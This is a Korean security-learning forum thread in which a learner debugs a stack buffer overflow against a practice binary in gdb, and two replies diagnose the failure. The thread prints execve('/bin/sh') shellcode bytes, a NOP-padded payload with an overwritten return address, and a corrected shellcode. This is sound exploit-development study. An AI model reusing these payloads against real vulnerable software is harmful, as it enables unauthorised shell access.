완료됨
Cannot access memory at address
답변 2 · 추천 4 · 조회 1257

return address에 쉘코드로 가는 주소를 적었는데 Cannot access memory at address 0x90909094가 떴습니다.
뭐가 잘못된걸까요?
(수정) 이제는 Cannot access memory at address 0x90909094는 안뜨는데 쉘코드가 안되네요ㅠㅠ
(gdb) disas main
Dump of assembler code for function main:
0x08048484 <+0>: push ebp
0x08048485 <+1>: mov ebp,esp
0x08048487 <+3>: sub esp,0x4
0x0804848a <+6>: cmp DWORD PTR [ebp+0x8],0x1
0x0804848e <+10>: jg 0x804849c <main+24>
0x08048490 <+12>: mov DWORD PTR [esp],0xffffffff
0x08048497 <+19>: call 0x8048310 exit@plt
0x0804849c <+24>: mov eax,DWORD PTR [ebp+0xc]
0x0804849f <+27>: add eax,0x4
0x080484a2 <+30>: mov eax,DWORD PTR [eax]
0x080484a4 <+32>: mov DWORD PTR [esp],eax
0x080484a7 <+35>: call 0x804843d <vuln>
0x080484ac <+40>: mov eax,0x0
0x080484b1 <+45>: leave
0x080484b2 <+46>: ret
End of assembler dump.
(gdb) b*0x804843d
Breakpoint 1 at 0x804843d
(gdb) r $(python -c 'print"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xd2\xb0\x0b\xcd\x80"+"\x90"*19+"\x98\xd5\xff\xff";')
Starting program: /home/reversing/./example1 $(python -c 'print"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xd2\xb0\x0b\xcd\x80"+"\x90"*19+"\x98\xd5\xff\xff";')

Breakpoint 1, 0x0804843d in vuln ()
Missing separate debuginfos, use: debuginfo-install glibc-2.17-324.el7_9.i686
(gdb) disas vuln
Dump of assembler code for function vuln:
=> 0x0804843d <+0>: push ebp
0x0804843e <+1>: mov ebp,esp
0x08048440 <+3>: push ebx
0x08048441 <+4>: sub esp,0x28
0x08048444 <+7>: lea edx,[ebp-0x24]
0x08048447 <+10>: mov ecx,0x0
0x0804844c <+15>: mov eax,0x20
0x08048451 <+20>: and eax,0xfffffffc
0x08048454 <+23>: mov ebx,eax
0x08048456 <+25>: mov eax,0x0
0x0804845b <+30>: mov DWORD PTR [edx+eax1],ecx
0x0804845e <+33>: add eax,0x4
0x08048461 <+36>: cmp eax,ebx
0x08048463 <+38>: jb 0x804845b <vuln+30>
0x08048465 <+40>: add edx,eax
0x08048467 <+42>: mov eax,DWORD PTR [ebp+0x8]
0x0804846a <+45>: mov DWORD PTR [esp+0x4],eax
0x0804846e <+49>: lea eax,[ebp-0x24]
0x08048471 <+52>: mov DWORD PTR [esp],eax
0x08048474 <+55>: call 0x8048300 strcpy@plt
0x08048479 <+60>: mov eax,0x0
0x0804847e <+65>: add esp,0x28
---Type <return> to continue, or q <return> to quit---
0x08048481 <+68>: pop ebx
0x08048482 <+69>: pop ebp
0x08048483 <+70>: ret
End of assembler dump.
(gdb) b0x08048474
Breakpoint 2 at 0x8048474
(gdb) c
Continuing.

Breakpoint 2, 0x08048474 in vuln ()
(gdb) x/16wx $esp
0xffffd590: 0xffffd598 0xffffd7bf 0x00000000 0x00000000
0xffffd5a0: 0x00000000 0x00000000 0x00000000 0x00000000
0xffffd5b0: 0x00000000 0x00000000 0xf7fbe000 0xffffd5c8
0xffffd5c0: 0x080484ac 0xffffd7bf 0x00000000 0xf7e112d3
(gdb) ni
0x08048479 in vuln ()
(gdb) x/16wx $esp
0xffffd590: 0xffffd598 0xffffd7bf 0x6850c031 0x68732f2f
0xffffd5a0: 0x69622f68 0x31e3896e 0xcd0bb0d2 0x90909080
0xffffd5b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd5c0: 0xffffd598 0xffffd700 0x00000000 0xf7e112d3
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xffffd5b9 in ?? ()
(gdb)

#시스템해킹
2021.08.22. 09:04
작성자 정보
더 깊이 있는 답변이 필요할 때
드림핵 팀과 멘토에게 직접 문의해 보세요!
Q&A Ticket 시작하기
답변 2
juno2
답변 등록: 25

쉘코드의 주소가 아닌, 쉘코드의 앞 부분을 적은 것 같아 보입니다.

2021.08.22. 09:30
xl4sh
강의 수강: 10

사용하신 쉘코드는 직접 만드신건가요?
쉘코드에 ecx레지스터에 값을 세팅해주는 부분이 없어서 문제가 발생했을 가능성이 있습니다

사용하신 쉘코드 - "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xd2\xb0\x0b\xcd\x80"

0:  31 c0                   xor    eax,eax
2:  50                      push   eax
3:  68 2f 2f 73 68          push   0x68732f2f
8:  68 2f 62 69 6e          push   0x6e69622f
d:  89 e3                   mov    ebx,esp
f:  31 d2                   xor    edx,edx
11: b0 0b                   mov    al,0xb
13: cd 80                   int    0x80

위와 같이 ecx레지스터에 값을 세팅하지 않습니다

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"

해당 강좌에서 제공해준 위의 쉘코드나 다른 쉘코드를 사용하시는것을 추천드립니다

2021.08.22. 16:18